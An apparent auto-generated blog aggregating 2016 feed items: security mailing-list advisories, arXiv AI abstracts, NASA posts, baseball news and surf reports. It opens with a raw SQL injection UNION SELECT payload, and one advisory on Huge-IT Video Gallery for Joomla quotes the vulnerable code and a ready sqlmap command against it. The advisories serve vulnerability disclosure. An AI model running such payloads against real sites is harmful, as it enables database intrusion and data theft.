ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= •

Source: Gmail -> IFTTT-> Blogger

[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-15 Download Site: http://ift.tt/2dbJpd3 Vendor: www.huge-it.com, fixed v1.1.0 Vendor Notified: 2016-09-17 Vendor Contact: info@huge-it.com Description: A video slideshow gallery. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC',1); 12 defined('_JEXEC') or die('Restircted access'); . . . 28 if($_POST['task']=="load_videos_content"){ 29 30 $page = 1; 31 32 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){ 34 $paramssld=''; 35 $db5 = JFactory::getDBO(); 36 $query5 = $db->getQuery(true); 37 $query5->select('*'); 38 $query5->from('#__huge_it_videogallery_params'); 39 $db->setQuery($query5); 40 $options_params = $db5->loadObjectList(); 41 foreach ($options_params as $rowpar) { 42 $key = $rowpar->name; 43 $value = $rowpar->value; 44 $paramssld[$key] = $value; 45 } 46 $page = $_POST["page"]; 47 $num=$_POST['perpage']; 48 $start = $page * $num - $num; 49 $idofgallery=$_POST['galleryid']; 50 51 $query = $db->getQuery(true); 52 $query->select('*'); 53 $query->from('#__huge_it_videogallery_videos'); 54 $query->where('videogallery_id ='.$idofgallery); 55 $query ->order('#__huge_it_videogallery_videos.ordering asc'); 56 $db->setQuery($query,$start,$num); CVE-2016-1000123 JSON: Export Exploit Code: • $ sqlmap -u 'http://ift.tt/2d3pdXg' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3 • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: •

Source: Gmail -> IFTTT-> Blogger

Introduction to Zcash, the anonymous Bitcoin

Bitcoin is an anonymous currency – this is one of greatest misconceptions surrounding Bitcoin which is, In a sense, the exact contrary of anonymous ...

from Google Alert - anonymous http://ift.tt/2cMOeXe
via IFTTT

NGC 3576: The Statue of Liberty Nebula


What's happening in the Statue of Liberty nebula? Bright stars and interesting molecules are forming and being liberated. The complex nebula resides in the star forming region called RCW 57. This image showcases dense knots of dark interstellar dust, bright stars that have formed in the past few million years, fields of glowing hydrogen gas ionized by these stars, and great loops of gas expelled by dying stars. A detailed study of NGC 3576, also known as NGC 3582 and NGC 3584, uncovered at least 33 massive stars in the end stages of formation, and the clear presence of the complex carbon molecules known as polycyclic aromatic hydrocarbons (PAHs). PAHs are thought to be created in the cooling gas of star forming regions, and their development in the Sun's formation nebula five billion years ago may have been an important step in the development of life on Earth. The featured image was taken at the Cerro Tololo Inter-American Observatory in Chile. via NASA http://ift.tt/2d6xf5q

GPM sees Louisiana Floods

Twice on August 12, 2016 GPM flew over a massive rainstorm that flooded large portions of Louisiana. The flooding was some of the worst ever in the state, resulting in a state of emergency. Tens of thousands of people were evacuated from their homes in the wake of this unprecedented event. Throughout the course of August 12 (UTC) GPM captured the internal structure of the storm twice and GPM IMERG measured the rainfall accumulation on the ground. NASA's GPM satellite is designed to measure rainfall using both passive microwave (GMI) and radar (DPR) instruments. DPR can observe 3D structures of radar signals reflected by rain and snow in a narrower swath. IMERG is a NASA data product that combines data from 12 different satellites into a single seamless map. IMERG covers more of the globe than any previous precipitation data set and is updated every half hour.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2d8vzbz
via IFTTT

Wednesday, September 28, 2016

Orioles Video: Hyun Soo Kim smacks pinch-hit HR in 9th to beat Blue Jays; now only 1 game behind Toronto for top WC spot (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

imported by the module 'MaterialAppModule'(anonymous function)

bootstrapModule @ application_ref.js:284(anonymous function) @ main.ts:11__webpack_require__ @ bootstrap d4f86e9…:52(anonymous function) ...

from Google Alert - anonymous http://ift.tt/2dsBkRh
via IFTTT

A Fast Factorization-based Approach to Robust PCA. (arXiv:1609.08677v1 [cs.CV])

Robust principal component analysis (RPCA) has been widely used for recovering low-rank matrices in many data mining and machine learning problems. It separates a data matrix into a low-rank part and a sparse part. The convex approach has been well studied in the literature. However, state-of-the-art algorithms for the convex approach usually have relatively high complexity due to the need of solving (partial) singular value decompositions of large matrices. A non-convex approach, AltProj, has also been proposed with lighter complexity and better scalability. Given the true rank $r$ of the underlying low rank matrix, AltProj has a complexity of $O(r^2dn)$, where $d\times n$ is the size of data matrix. In this paper, we propose a novel factorization-based model of RPCA, which has a complexity of $O(kdn)$, where $k$ is an upper bound of the true rank. Our method does not need the precise value of the true rank. From extensive experiments, we observe that AltProj can work only when $r$ is precisely known in advance; however, when the needed rank parameter $r$ is specified to a value different from the true rank, AltProj cannot fully separate the two parts while our method succeeds. Even when both work, our method is about 4 times faster than AltProj. Our method can be used as a light-weight, scalable tool for RPCA in the absence of the precise value of the true rank.



from cs.AI updates on arXiv.org http://ift.tt/2d5THbN
via IFTTT

Hierarchical Memory Networks for Answer Selection on Unknown Words. (arXiv:1609.08843v1 [cs.IR])

Recently, end-to-end memory networks have shown promising results on Question Answering task, which encode the past facts into an explicit memory and perform reasoning ability by making multiple computational steps on the memory. However, memory networks conduct the reasoning on sentence-level memory to output coarse semantic vectors and do not further take any attention mechanism to focus on words, which may lead to the model lose some detail information, especially when the answers are rare or unknown words. In this paper, we propose a novel Hierarchical Memory Networks, dubbed HMN. First, we encode the past facts into sentence-level memory and word-level memory respectively. Then, (k)-max pooling is exploited following reasoning module on the sentence-level memory to sample the (k) most relevant sentences to a question and feed these sentences into attention mechanism on the word-level memory to focus the words in the selected sentences. Finally, the prediction is jointly learned over the outputs of the sentence-level reasoning module and the word-level attention mechanism. The experimental results demonstrate that our approach successfully conducts answer selection on unknown words and achieves a better performance than memory networks.



from cs.AI updates on arXiv.org http://ift.tt/2cMbBjU
via IFTTT

Global Constraint Catalog, Volume II, Time-Series Constraints. (arXiv:1609.08925v1 [cs.AI])

First this report presents a restricted set of finite transducers used to synthesise structural time-series constraints described by means of a multi-layered function composition scheme. Second it provides the corresponding synthesised catalogue of structural time-series constraints where each constraint is explicitly described in terms of automata with accumulators.



from cs.AI updates on arXiv.org http://ift.tt/2dfTyCb
via IFTTT

Learning from the Hindsight Plan -- Episodic MPC Improvement. (arXiv:1609.09001v1 [cs.RO])

Model predictive control (MPC) is a popular control method that has proved effective for robotics, among other fields. MPC performs re-planning at every time step. Re-planning is done with a limited horizon per computational and real-time constraints and often also for robustness to potential model errors. However, the limited horizon leads to suboptimal performance. In this work, we consider the iterative learning setting, where the same task can be repeated several times, and propose a policy improvement scheme for MPC. The main idea is that between executions we can, offline, run MPC with a longer horizon, resulting in a hindsight plan. To bring the next real-world execution closer to the hindsight plan, our approach learns to re-shape the original cost function with the goal of satisfying the following property: short horizon planning (as realistic during real executions) with respect to the shaped cost should result in mimicking the hindsight plan. This effectively consolidates long-term reasoning into the short-horizon planning. We empirically evaluate our approach in contact-rich manipulation tasks both in simulated and real environments, such as peg insertion by a real PR2 robot.



from cs.AI updates on arXiv.org http://ift.tt/2d87u4D
via IFTTT

Mysteries of Visual Experience. (arXiv:1604.08612v2 [q-bio.NC] UPDATED)

Science is a crowning glory of the human spirit and its applications remain our best hope for social progress. But there are limitations to current science and perhaps to any science. The general mind-body problem is known to be intractable and currently mysterious. This is one of many deep problems that are universally agreed to be beyond the current purview of Science, including quantum phenomena, etc. But all of these famous unsolved problems are either remote from everyday experience (entanglement, dark matter) or are hard to even define sharply (phenomenology, consciousness, etc.).

In this note, we will consider some obvious computational problems in vision that arise every time that we open our eyes and yet are demonstrably incompatible with current theories of neural computation. The focus will be on two related phenomena, known as the neural binding problem and the illusion of a detailed stable visual world.



from cs.AI updates on arXiv.org http://ift.tt/1O8yt6o
via IFTTT

Anonymous

Anonymous. Major Events and Hacktivism #OpOlympicHacking. August 20, 2016 | RSA · Major Events and Hacktivism #OpOlympicHacking.

from Google Alert - anonymous http://ift.tt/2cWDx2g
via IFTTT

Apple Tracks Who You're Chatting Using iMessage — and Shares that Data with Police

Doing conversations with your friend on iMessage and thinking that they are safe and out of reach from anyone else other than you and your friend? No, it's not. End-to-end encryption doesn't mean that your iMessages are secure enough to hide your trace because Apple not only stores a lot of information about your iMessages that could reveal your contacts and location, but even share that


from The Hacker News http://ift.tt/2cWs7LK
via IFTTT

Ravens: LB Elvis Dumervil (foot) to make 2016 debut Sunday against Raiders, according to LB Terrell Suggs (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ocean City, MD's surf is at least 5.54ft high

Maryland-Delaware, October 04, 2016 at 04:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 2.36ft. At 10:00 AM, surf min of 3.22ft. At 4:00 PM, surf min of 5.54ft. At 10:00 PM, surf min of 5.99ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.54ft (1.69m)
Tide height: 0.61ft (0.18m)
Wind direction: ENE
Wind speed: 24.76 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities

ISS Daily Summary Report – 09/27/2016

Group Combustion Module (GCM) Installation:  Today, FE-5 with the assistance of FE-6, started the first of two days of installation and preparation for the GCM experiment.  The crew began with assembly of the GCM attaching cameras and the Fuel Supply Syringe.  Following GCM setup, the crew then began configuration of the Combustion Chamber attaching the necessary valves and filters.  The GCM will then be installed into the Combustion Chamber.  The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets.  In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads.  Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made. Hard to Wet Surfaces:  FE-6 performed the battery charging activities for the Hard to Wet Surfaces payload.  Later today, the crew will verify the configuration and field of view of the camera used to collect data of the payload.  The Hard to Wet Surfaces (Eli Lilly-Hard to Wet Surfaces) investigation studies how certain materials used in the pharmaceutical industry dissolve in water while in microgravity.  Results from this investigation could help improve the design of tablets that dissolve in the body to deliver drugs, thereby improving drug design for medicines used in space and on Earth.  Marangoni Experiment (Dynamic Surf 3):  Last week ground controllers performed an Image Processing Unit (IPU) video check and determined the front cover fasteners required tightening.  FE-5 performed the tightening over the weekend and subsequent IPU checks confirmed a good configuration to resume Dynamic Surf operations.  Last night, ground controllers initiated the first of two overnight of the Marangoni sessions in the Fluid Physics Experiment Facility (FPEF).  The Dynamic Surf investigation is part of a series of JAXA experiments studying Marangoni convection driven by the presence of surface tension gradients produced by a temperature difference at a liquid/gas interface.  By observing and understanding how a silicone oil liquid bridge moves, researchers can learn about how heat is transferred in microgravity and ultimately drive the design and development of more efficient fluid flow based systems and devices. Space Station Remote Manipulator System (SSRMS) Latching End Effector (LEE) Survey:  Today, Robotics Ground Controllers powered up the Mobile Servicing System (MSS) and maneuvered the SSRMS to the survey position for LEE B.  The EHDC was then used to survey the LEE Snare cables as it was done last Monday, but with different points of view and optimizing the lighting conditions for still imagery.  SSRMS performance today was nominal.  Waste and Hygiene Compartment (WHC) Urine Receptacle (UR) Replacement:  This morning the crew changed out the Urine Hose and Receptacle that was installed yesterday, recovering WHC functionality.  Yesterday, after the crew replaced the Urine Hose and Receptacle as part of regularly scheduled maintenance, the WHC Pump Separator unexpectedly continued to run after the crew closed a urine valve.  After cycling the valve, the Pump Separator did turn off.  WHC is approved for use at this time. JEM ORU Transfer Interface (JOTI) and Robotics External Leak Locator (RELL) Installation on Japanese Experiment Module (JEM) Airlock (A/L) Slide Table:  FE-6 ingressed Pressurized Mating Adapter-2 (PMA2), retrieved the JOTI hardware, and installed the JOTI on the JEM A/L Slide Table.  Afterwards, the crew installed the Robotics External Leak Locator (RELL) onto the JOTI, and retracted the Slide Table inside the JEM A/L.  RELL is a technology demonstration designed to locate external ISS ammonia (NH3) leaks.  Prior to using it for locating actual leaks, an on-orbit test needs to be performed to understand the background environment of ISS and how that affects leak locating.  This on-orbit test will be scheduled later in Increment 49. Today’s Planned Activities All activities completed unless otherwise noted. WHC Urine Receptacle (UR) and Insert Filter (IF) Remove and Replace XF305 Camcorder Setup Group Combustion Module (GCM) Familiarization Group Combustion Module (GCM) Setup MRM2 comm config to support the P/L Ops Kulonovskiy Kristall Experiment Run. Node 2 Endcone Unstow PMA2 Ingress MRM2 Comm Reconfig for Nominal Ops KULONOVSKIY KRISTALL. Copy and Downlink Data Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Setup VIZIR. Experiment set up and start using СКПИ P/L. PMA2 Stowage Retrieval PMA2 Surface Inspection for Condensation PMA2 Egress Group Combustion Module (GCM) Install Node 2 Endcone Unstow Group Combustion Module (GCM) Install Support Water Recovery System Waste Water Tank Drain Init (Deferred) BEAM (Bigelow Expandable Activities Module) Modal Test Review Water Recovery System Waste Water Tank Drain Termination (Deferred) Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ JEM Airlock Slide Table (ST) Extension to JPM Side Personal CO2 Monitor Power Cycle Total Organic Carbon Analyzer (TOCA) Calibration Check Structures and Mechanisms JEM ORU Xfer I/F and Robo Ext Leak Locator Installation Spaceflight Cognitive Assessment Tool for Windows (WinSCAT) Test СОЖ Maintenance VIZIR. СКПИ Closeout Ops. JEM Airlock Slide Table (ST) Retraction from JPM Side Download Pille Dosimeter Readings Exercise Data Downlink via OCA Hard To Wet Surfaces Set Up Check Total Organic Carbon Analyzer (TOCA) Calibration Check Data Record Personal CO2 Monitor Power Cycle Personal CO2 Monitor iPad Application Restart Completed Task List Items None  Ground Activities All activities completed unless otherwise noted. Robotics Ground Control for SSRMS LEE Survey Three-Day Look Ahead: Wednesday, 09/28: Combustion Module Installation and Checkout, Finemotor Skills, Hard to Wet Surfaces Thursday, 09/29: BEAM Ingress and Modal Test Friday, 09/30: Energy Experiment, WSTA Fills QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) […]

from ISS On-Orbit Status Report http://ift.tt/2dls9MS
via IFTTT

The Weeknd “Star Boy”

The Weeknd “Star Boy”. The Weeknd “Star Boy”. Search. Videos. No results found. News. No results found.

from Google Alert - anonymous http://ift.tt/2drJWmJ
via IFTTT

[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal # Date : 28/09/2016 # Author : R-73eN # Tested on : Symantec Messaging Gateway 10.6.1 (Latest) # Software : http://ift.tt/2cBcgkZ # Vendor : Symantec # CVE : CVE-2016-5312 # DESCRIPTION: # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. # This could potentially provide read access to some files/directories on the server for which the user is not authorized.

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)

Hello, Please find a text-only version below sent to security mailing lists. The complete version on analysing the security in Dlink 932B LTE routers is posted here: http://ift.tt/2deyBYo === text-version of the advisory without technical explanations ===

Source: Gmail -> IFTTT-> Blogger

[FD] Edward Snowden won Glas of Reason - (Glas der Vernunft) Award 2016

Award 2016 "Glas of Reason" (Glas der Vernunft) for Edward Snowden (10.000€) @snowden - Security Press Articles http://ift.tt/2cDspJG http://ift.tt/1GaYt2i http://ift.tt/2dkgRbV http://ift.tt/2cKIgGH http://ift.tt/2dkgHkS http://ift.tt/2cKJvpj http://ift.tt/2dkgKgs - http://ift.tt/2cKIQE3 http://ift.tt/2dkh3rJ http://ift.tt/2cKITjc http://ift.tt/2dkgT3q http://ift.tt/2cKIRrB http://ift.tt/2dkgEFA http://ift.tt/2cKIzB3 http://ift.tt/2dkgi1J - Note: The video recodings will be published transparently by an uncensored german source within the next days! Feel free to share and enjoy the unique statement.

Source: Gmail -> IFTTT-> Blogger

Ocean City, MD's surf is at least 5.73ft high

Maryland-Delaware, September 29, 2016 at 04:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 4.19ft. At 10:00 AM, surf min of 4.67ft. At 4:00 PM, surf min of 5.73ft. At 10:00 PM, surf min of 5.67ft.

Surf maximum: 6.3ft (1.92m)
Surf minimum: 5.73ft (1.75m)
Tide height: 1.6ft (0.49m)
Wind direction: E
Wind speed: 22.18 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Cosma

First try for Glitch animation. If you like, don't forget to press 'L' check this shot with this Soundtrack.

from Google Alert - anonymous http://ift.tt/2d3u5Mp
via IFTTT

World's largest 1 Tbps DDoS Attack launched from 152,000 hacked Smart Devices

Do you know — Your Smart Devices may have inadvertently participated in a record-breaking largest cyber attack that Internet has just witnessed. If you own a smart device like Internet-connected televisions, cars, refrigerators or thermostats, you might already be part of a botnet of millions of infected devices that was used to launch the biggest DDoS attack known to date, with peaks of over


from The Hacker News http://ift.tt/2cUVfmu
via IFTTT

Jupiters Europa from Spacecraft Galileo


What mysteries might be solved by peering into this crystal ball? In this case, the ball is actually a moon of Jupiter, the crystals are ice, and the moon is not only dirty but cracked beyond repair. Nevertheless, speculation is rampant that oceans exist under Europa's fractured ice-plains that could support life. This speculation was bolstered again this week by released images from the Hubble Space Telescope indicating that plumes of water vapor sometimes emanate from the ice-crusted moon -- plumes that might bring microscopic sea life to the surface. Europa, roughly the size of Earth's Moon, is pictured here in natural color as photographed in 1996 by the now-defunct Jupiter-orbiting Galileo spacecraft. Future observations by Hubble and planned missions such as the James Webb Space Telescope later this decade and a Europa flyby mission in the 2020s may further humanity's understanding not only of Europa and the early Solar System but also of the possibility that life exists elsewhere in the universe. via NASA http://ift.tt/2cI4cSM

Tuesday, September 27, 2016

Orioles fall to the Blue Jays 5-1, cling to one-game lead over the Tigers for the final AL wild-card spot (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Chris Davis and Buck Showalter both ejected for arguing in 7th inning of Tuesday's game against the Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Online Segment to Segment Neural Transduction. (arXiv:1609.08194v1 [cs.CL])

We introduce an online neural sequence to sequence model that learns to alternate between encoding and decoding segments of the input as it is read. By independently tracking the encoding and decoding representations our algorithm permits exact polynomial marginalization of the latent segmentation during training, and during decoding beam search is employed to find the best alignment path together with the predicted output sequence. Our model tackles the bottleneck of vanilla encoder-decoders that have to read and memorize the entire input sequence in their fixed-length hidden states before producing any output. It is different from previous attentive models in that, instead of treating the attention weights as output of a deterministic function, our model assigns attention weights to a sequential latent variable which can be marginalized out and permits online generation. Experiments on abstractive sentence summarization and morphological inflection show significant performance gains over the baseline encoder-decoders.



from cs.AI updates on arXiv.org http://ift.tt/2dxVCER
via IFTTT

Learning to Translate for Multilingual Question Answering. (arXiv:1609.08210v1 [cs.CL])

In multilingual question answering, either the question needs to be translated into the document language, or vice versa. In addition to direction, there are multiple methods to perform the translation, four of which we explore in this paper: word-based, 10-best, context-based, and grammar-based. We build a feature for each combination of translation direction and method, and train a model that learns optimal feature weights. On a large forum dataset consisting of posts in English, Arabic, and Chinese, our novel learn-to-translate approach was more effective than a strong baseline (p<0.05): translating all text into English, then training a classifier based only on English (original or translated) text.



from cs.AI updates on arXiv.org http://ift.tt/2d8d3Mu
via IFTTT

Top-N Recommendation on Graphs. (arXiv:1609.08264v1 [cs.IR])

Recommender systems play an increasingly important role in online applications to help users find what they need or prefer. Collaborative filtering algorithms that generate predictions by analyzing the user-item rating matrix perform poorly when the matrix is sparse. To alleviate this problem, this paper proposes a simple recommendation algorithm that fully exploits the similarity information among users and items and intrinsic structural information of the user-item matrix. The proposed method constructs a new representation which preserves affinity and structure information in the user-item rating matrix and then performs recommendation task. To capture proximity information about users and items, two graphs are constructed. Manifold learning idea is used to constrain the new representation to be smooth on these graphs, so as to enforce users and item proximities. Our model is formulated as a convex optimization problem, for which we need to solve the well-known Sylvester equation only. We carry out extensive empirical evaluations on six benchmark datasets to show the effectiveness of this approach.



from cs.AI updates on arXiv.org http://ift.tt/2dBezcB
via IFTTT

Decision Making Based on Cohort Scores for Speaker Verification. (arXiv:1609.08419v1 [cs.SD])

Decision making is an important component in a speaker verification system. For the conventional GMM-UBM architecture, the decision is usually conducted based on the log likelihood ratio of the test utterance against the GMM of the claimed speaker and the UBM. This single-score decision is simple but tends to be sensitive to the complex variations in speech signals (e.g. text content, channel, speaking style, etc.). In this paper, we propose a decision making approach based on multiple scores derived from a set of cohort GMMs (cohort scores). Importantly, these cohort scores are not simply averaged as in conventional cohort methods; instead, we employ a powerful discriminative model as the decision maker. Experimental results show that the proposed method delivers substantial performance improvement over the baseline system, especially when a deep neural network (DNN) is used as the decision maker, and the DNN input involves some statistical features derived from the cohort scores.



from cs.AI updates on arXiv.org http://ift.tt/2d8cFgO
via IFTTT

Local Training for PLDA in Speaker Verification. (arXiv:1609.08433v1 [cs.SD])

PLDA is a popular normalization approach for the i-vector model, and it has delivered state-of-the-art performance in speaker verification. However, PLDA training requires a large amount of labeled development data, which is highly expensive in most cases. A possible approach to mitigate the problem is various unsupervised adaptation methods, which use unlabeled data to adapt the PLDA scattering matrices to the target domain.

In this paper, we present a new `local training' approach that utilizes inaccurate but much cheaper local labels to train the PLDA model. These local labels discriminate speakers within a single conversion only, and so are much easier to obtain compared to the normal `global labels'. Our experiments show that the proposed approach can deliver significant performance improvement, particularly with limited globally-labeled data.



from cs.AI updates on arXiv.org http://ift.tt/2dBd6Tt
via IFTTT

Model-based Test Generation for Robotic Software: Automata versus Belief-Desire-Intention Agents. (arXiv:1609.08439v1 [cs.AI])

Robotic code needs to be verified to ensure its safety and functional correctness, especially when the robot is interacting with people. Testing the real code in simulation is a viable option. It reduces the costs of experiments and provides detail that is lost when using formal methods. However, generating tests that cover interesting scenarios, while executing most of the code, is a challenge amplified by the complexity of the interactions between the environment and the software. Model-based test generation methods can automate otherwise manual processes and facilitate reaching rare scenarios during testing. In this paper, we compare the use of Belief-Desire-Intention (BDI) agents as models for test generation, with more conventional, model-based test generation, that exploits automata and model checking techniques, and random test generation methods, in terms of practicality, performance, scalability, and exploration (`coverage'). Simulators and automated testbenches were implemented in Robot Operating System (ROS) and Gazebo, for testing the code of two robots, BERT2 in a cooperative manufacture (table assembly) task, and Tiago as a home care assistant. The results highlight the clear advantages of using BDI agents for test generation, compared to random and conventional automata-based approaches. BDI agents naturally emulate the agency present in Human-Robot Interaction (HRI). They are thus more expressive and scale well in HRI applications.



from cs.AI updates on arXiv.org http://ift.tt/2d8e5YM
via IFTTT

Weakly Supervised PLDA Training. (arXiv:1609.08441v1 [cs.LG])

PLDA is a popular normalization approach for the i-vector model, and it has delivered state-of-the-art performance in speaker verification. However, PLDA training requires a large amount of labelled development data, which is highly expensive in most cases. We present a cheap PLDA training approach, which assumes that speakers in the same session can be easily separated, and speakers in different sessions are simply different. This results in `weak labels' which are not fully accurate but cheap, leading to a weak PLDA training.

Our experimental results on real-life large-scale telephony customer service achieves demonstrated that the weak training can offer good performance when human-labelled data are limited. More interestingly, the weak training can be employed as a discriminative adaptation approach, which is more efficient than the prevailing unsupervised method when human-labelled data are insufficient.



from cs.AI updates on arXiv.org http://ift.tt/2dBcVrk
via IFTTT

Collaborative Learning for Language and Speaker Recognition. (arXiv:1609.08442v1 [cs.SD])

This paper presents a unified model to perform language and speaker recognition simultaneously and altogether. The model is based on a multi-task recurrent neural network where the output of one task is fed as the input of the other, leading to a collaborative learning framework that can improve both language and speaker recognition by borrowing information from each other. Our experiments demonstrated that the multi-task model outperforms the task-specific models on both tasks.



from cs.AI updates on arXiv.org http://ift.tt/2d8dPcv
via IFTTT

AP16-OL7: A Multilingual Database for Oriental Languages and A Language Recognition Baseline. (arXiv:1609.08445v1 [cs.CL])

We present the AP16-OL7 database which was released as the training and test data for the oriental language recognition (OLR) challenge on APSIPA 2016. Based on the database, a baseline system was constructed on the basis of the i-vector model. We report the baseline results evaluated in various metrics defined by the AP16-OLR evaluation plan and demonstrate that AP16-OL7 is a reasonable data resource for multilingual research.



from cs.AI updates on arXiv.org http://ift.tt/2dBdfGC
via IFTTT

A computer program for simulating time travel and a possible 'solution' for the grandfather paradox. (arXiv:1609.08470v1 [cs.AI])

While the possibility of time travel in physics is still debated, the explosive growth of virtual-reality simulations opens up new possibilities to rigorously explore such time travel and its consequences in the digital domain. Here we provide a computational model of time travel and a computer program that allows exploring digital time travel. In order to explain our method we formalize a simplified version of the famous grandfather paradox, show how the system can allow the participant to go back in time, try to kill their ancestors before they were born, and experience the consequences. The system has even come up with scenarios that can be considered consistent "solutions" of the grandfather paradox. We discuss the conditions for digital time travel, which indicate that it has a large number of practical applications.



from cs.AI updates on arXiv.org http://ift.tt/2d8dXsk
via IFTTT

UbuntuWorld 1.0 LTS - A Platform for Automated Problem Solving & Troubleshooting in the Ubuntu OS. (arXiv:1609.08524v1 [cs.AI])

In this paper, we present UbuntuWorld 1.0 LTS - a platform for developing automated technical support agents in the Ubuntu operating system. Specifically, we propose to use the Bash terminal as a simulator of the Ubuntu environment for a learning-based agent and demonstrate the usefulness of adopting reinforcement learning (RL) techniques for basic problem solving and troubleshooting in this environment. We provide a plug-and-play interface to the simulator as a python package where different types of agents can be plugged in and evaluated, and provide pathways for integrating data from online support forums like Ask Ubuntu into an automated agent's learning process. Finally, we show that the use of this data significantly improves the agent's learning efficiency. We believe that this platform can be adopted as a real-world test bed for research on automated technical support.



from cs.AI updates on arXiv.org http://ift.tt/2dBcFsF
via IFTTT

A partial taxonomy of judgment aggregation rules, and their properties. (arXiv:1502.05888v3 [cs.AI] UPDATED)

The literature on judgment aggregation is moving from studying impossibility results regarding aggregation rules towards studying specific judgment aggregation rules. Here we give a structured list of most rules that have been proposed and studied recently in the literature, together with various properties of such rules. We first focus on the majority-preservation property, which generalizes Condorcet-consistency, and identify which of the rules satisfy it. We study the inclusion relationships that hold between the rules. Finally, we consider two forms of unanimity, monotonicity, homogeneity, and reinforcement, and we identify which of the rules satisfy these properties.



from cs.AI updates on arXiv.org http://ift.tt/1JALlVi
via IFTTT

Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation. (arXiv:1609.08144v1 [cs.LG])

Neural Machine Translation (NMT) is an end-to-end learning approach for automated translation, with the potential to overcome many of the weaknesses of conventional phrase-based translation systems. Unfortunately, NMT systems are known to be computationally expensive both in training and in translation inference. Also, most NMT systems have difficulty with rare words. These issues have hindered NMT's use in practical deployments and services, where both accuracy and speed are essential. In this work, we present GNMT, Google's Neural Machine Translation system, which attempts to address many of these issues. Our model consists of a deep LSTM network with 8 encoder and 8 decoder layers using attention and residual connections. To improve parallelism and therefore decrease training time, our attention mechanism connects the bottom layer of the decoder to the top layer of the encoder. To accelerate the final translation speed, we employ low-precision arithmetic during inference computations. To improve handling of rare words, we divide words into a limited set of common sub-word units ("wordpieces") for both input and output. This method provides a good balance between the flexibility of "character"-delimited models and the efficiency of "word"-delimited models, naturally handles translation of rare words, and ultimately improves the overall accuracy of the system. Our beam search technique employs a length-normalization procedure and uses a coverage penalty, which encourages generation of an output sentence that is most likely to cover all the words in the source sentence. On the WMT'14 English-to-French and English-to-German benchmarks, GNMT achieves competitive results to state-of-the-art. Using a human side-by-side evaluation on a set of isolated simple sentences, it reduces translation errors by an average of 60% compared to Google's phrase-based production system.



from cs.AI updates on arXiv.org http://ift.tt/2cYvrrM
via IFTTT

I have a new follower on Twitter


UpCity
UpCity is a local inbound marketing platform built for agencies looking to acquire, scale, and drive results for their small business customers profitably.
Chicago, IL
http://t.co/BGcqTqzCtN
Following: 2383 - Followers: 3491

September 27, 2016 at 05:47PM via Twitter http://twitter.com/upcityinc

Anonymous user cannot upload private file

Anonymous users are not able to upload files when the upload destination is set to "private files". This problem does not occur with the basic Drupal ...

from Google Alert - anonymous http://ift.tt/2di7mtR
via IFTTT

Re: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

Hi Fernando, Do you have a timeline for this issue? Additionally do you have any contact details for the w3tc team you could share? All my attempts to contact them have fallen short. On 21/09/16 13:56, Fernando A. Lagos Berardi wrote: > [+] Description: Cross-Site Scripting vulnerability was found on Wordpress > W3 Total Cache (w3tc) plugin. > [+] Plugin Version tested: <= 0.9.4.1 (latest) > [+] Wordpress version tested: 4.0.0 - 4.6.1 (latest) > >

Source: Gmail -> IFTTT-> Blogger

[FD] IE11 is not following CORS specification for local files

